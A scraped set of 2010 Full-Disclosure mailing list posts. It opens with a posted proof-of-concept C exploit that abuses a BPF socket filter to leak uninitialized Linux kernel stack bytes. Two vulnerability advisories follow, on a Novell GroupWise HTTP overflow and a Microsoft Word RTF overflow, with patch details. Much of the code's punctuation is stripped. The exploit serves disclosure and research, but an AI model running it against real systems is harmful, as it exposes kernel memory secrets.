http://marc.info/?l=linux-netdevm=128934173821229w=2 On Tue, Nov 9, 2010 at 5:18 PM, Dan Rosenberg dan.j.rosenb...@gmail.com wrote: Enjoy... -Dan /* * You've done it. After hours of gdb and caffeine, you've finally got a shell * on your target's server. Maybe next time they will think twice about * running MyFirstCompSciProjectFTPD on a production machine. As you take * another sip of Mountain Dew and pick some of the cheetos out of your beard, * you begin to plan your next move - it's time to tackle the kernel. * * What should be your goal? Privilege escalation? That's impossible, there's * no such thing as a privilege escalation vulnerability on Linux. Denial of * service? What are you, some kind of script kiddie? No, the answer is * obvious. You must read the uninitialized bytes of the kernel stack, since * these bytes contain all the secrets of the universe and the meaning of life. * * How can you accomplish this insidious feat? You immediately discard the * notion of looking for uninitialized struct members that are copied back to * userspace, since you clearly need something far more elite. In order to * prove your superiority, your exploit must be as sophisticated as your taste * in obscure electronic music. After scanning the kernel source for good * candidates, you find your target and begin to code... * * by Dan Rosenberg * * Greets to kees, taviso, jono, spender, hawkes, and bla * */ #include string.h #include stdio.h #include netinet/in.h #include sys/socket.h #include unistd.h #include stdlib.h #include linux/filter.h #define PORT 37337 int transfer(int sendsock, int recvsock) { struct sockaddr_in addr; char buf[512]; int len = sizeof(addr); memset(buf, 0, sizeof(buf)); if (fork()) return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)addr, len); sleep(1); memset(addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(127.0.0.1); sendto(sendsock, buf, 512, 0, (struct sockaddr *)addr, len); exit(0); } int main(int argc, char * argv[]) { int sendsock, recvsock, ret; unsigned int val; struct sockaddr_in addr; struct sock_fprog fprog; struct sock_filter filters[5]; if (argc != 2) { printf([*] Usage: %s offset (0-63)\n, argv[0]); return -1; } val = atoi(argv[1]); if (val 63) { printf([*] Invalid byte offset (must be 0-63)\n); return -1; } recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (recvsock 0 || sendsock 0) { printf([*] Could not create sockets.\n); return -1; } memset(addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = htonl(INADDR_ANY); if (bind(recvsock, (struct sockaddr *)addr, sizeof(addr)) 0) { printf([*] Could not bind socket.\n); return -1; } memset(fprog, 0, sizeof(fprog)); memset(filters, 0, sizeof(filters)); filters[0].code = BPF_LD|BPF_MEM; filters[0].k = (val ~0x3) / 4; filters[1].code = BPF_ALU|BPF_AND|BPF_K; filters[1].k = 0xff ((val % 4) * 8); filters[2].code = BPF_ALU|BPF_RSH|BPF_K; filters[2].k = (val % 4) * 8; filters[3].code = BPF_ALU|BPF_ADD|BPF_K; filters[3].k = 256; filters[4].code = BPF_RET|BPF_A; fprog.len = 5; fprog.filter = filters; if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, fprog, sizeof(fprog)) 0) { printf([*] Failed to install filter.\n); return -1; } ret = transfer(sendsock, recvsock); printf([*] Your byte: 0x%.02x\n, ret - 248); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-247: Novell Groupwise GWPOA HTTP Request Remote Code Execution Vulnerability
ZDI-10-247: Novell Groupwise GWPOA HTTP Request Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-247 November 9, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Novell -- Affected Products: Novell Groupwise -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10328. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability. The specific flaw exists in a function responsible for assembling an HTTP response. The following modules implement this functionality: gwpoa.exe, gwmta.exe, gwia.exe. When responding to an HTTP request sent to TCP port 7101 or 7100 or in the case of gwia.exe the user configured Message Transfer Port, the process uses the client-specified Host: header to create an HTTP 301 redirection message. Within this code a local stack buffer is used to store the redirect location and can be overflown with a sufficiently long header value. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: Novell states: Linux - http://download.novell.com/Download?buildid=04oMMaiI9nI~ NetWare/Windows - http://download.novell.com/Download?buildid=aq06Eoy7rf4~ The HTTP interfaces for the GroupWise agents (Message Transfer Agent, Post Office Agent, Internet Agent, WebAccess Agent, Monitor Agent) are vulnerable to an exploit that could allow a remote attacker to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability. Affected versions: GroupWise 8.0x, 8.01x, 8.02. Previous versions of GroupWise are likely also vulnerable but are no longer supported. Customers on earlier versions of GroupWise should, at a minimum, upgrade their GroupWise systems to version 8.02HP (or disable the GroupWise Agents' HTTP interfaces) in order to secure their system. This vulnerability was discovered and reported by Anonymous working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com), ZDI-CAN-770 Novell bug 627942, CVE number pending Related TID: http://www.novell.com/support/search.do?usemicrosite=truesearchString=7007159 -- Disclosure Timeline: 2010-06-10 - Vulnerability reported to vendor 2010-11-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability
iDefense Security Advisory 11.09.10 http://labs.idefense.com/intelligence/vulnerabilities/ Nov 09, 2010 I. BACKGROUND Microsoft Word is a word processing application from Microsoft Office. For more information about Microsoft Word, see the following website: http://office.microsoft.com/en-us/word/default.aspx Rich-Text Format (RTF) is a document file format developed by Microsoft for cross-platform document interchange. II. DESCRIPTION Remote exploitation of a stack buffer overflow vulnerability in Microsoft Corp.'s Word could allow attackers to execute arbitrary code under the privileges of the targeted user. This vulnerability specifically exists in the handling of a specific control word in an RTF document. Under certain circumstances, Word will copy its property strings into a stack buffer without checking the length, which causes a stack buffer overflow. III. ANALYSIS Exploitation allows remote attackers to execute arbitrary code on the affected host under the context of the user who opened the malicious RTF document with Microsoft Word. Exploitation might require that the user open a specially crafted RTF document with a vulnerable application. The most likely exploitation vector involves convincing a user to open an RTF document sent to the user via e-mail or linked on a website. Since Outlook 2007 uses the Word engine to process e-mails, it is also affected by this vulnerability. The attacker can send the user a specially crafted RTF e-mail. When this e-mail is opened or displayed in the preview pane using Outlook 2007, the vulnerability will be triggered. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Microsoft Word 2003, Microsoft Word 2007, and Microsoft Outlook 2007. The following Microsoft products are vulnerable: * Microsoft Office XP SP 3 * Microsoft Office 2003 SP 3 * Microsoft Office 2007 SP 2 * Microsoft Office 2010 (32-bit editions) * Microsoft Office 2010 (64-bit editions) * Microsoft Office for Mac 2011 V. WORKAROUND Microsoft recommends reading e-mail in plain-text format as a workaround. VI. VENDOR RESPONSE Microsoft Corp. has released patches which address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010- to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/12/2009 Initial Vendor Notification 08/12/2009 Initial Vendor Reply 11/09/2010 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by wushi of team509. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/